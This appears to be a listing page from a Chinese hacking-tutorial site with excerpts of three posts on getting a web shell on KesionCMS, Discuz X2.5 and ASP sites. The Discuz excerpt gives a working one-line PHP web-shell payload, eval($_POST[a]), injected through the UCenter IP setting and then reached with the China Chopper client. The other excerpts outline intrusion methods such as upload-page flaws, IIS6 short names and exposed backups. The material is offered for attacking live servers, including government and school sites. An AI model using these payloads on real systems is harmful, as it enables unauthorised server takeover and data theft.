科讯kesioncms 5.5以下漏洞拿shell方法原理总结

讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增大了拿shell 的难度。下面就个版本拿shell 的方法做一总结。 KesionCMS V3.x和3.x以下版本 网上有0day工具不过没有具体原理,下面就讲一下手工拿shell的方法 关键字:inurl...

- 阅读全文 -

discuz X2.5后台拿shell及修复

有管理员帐号及密码。  直接在UCenter IP 地址:里面插入一句话 xxoo\');eval($_POST[a])?>;//  就ok 然后菜刀连接https://www.webshell.cc/config/config_ucenter.php密码a , 测试通过

- 阅读全文 -

整理asp漏洞与入侵方式

0x00 前言 0x10 WEBDAV 0x20 IIS6短文件名漏洞 0x30 网站源代码 0x40 网站备份文件、说明文件、数据库备份文件与robots.txt 0x41 网站备份文件 0x42说明文件 0x43数据库备份文件 0x44 Robots.txt 0x50 未验证的上传页面 0x51 经典的upload.asp/upfile.asp组合 0x52 与之类似的上传漏洞 0x53黑名单...

- 阅读全文 -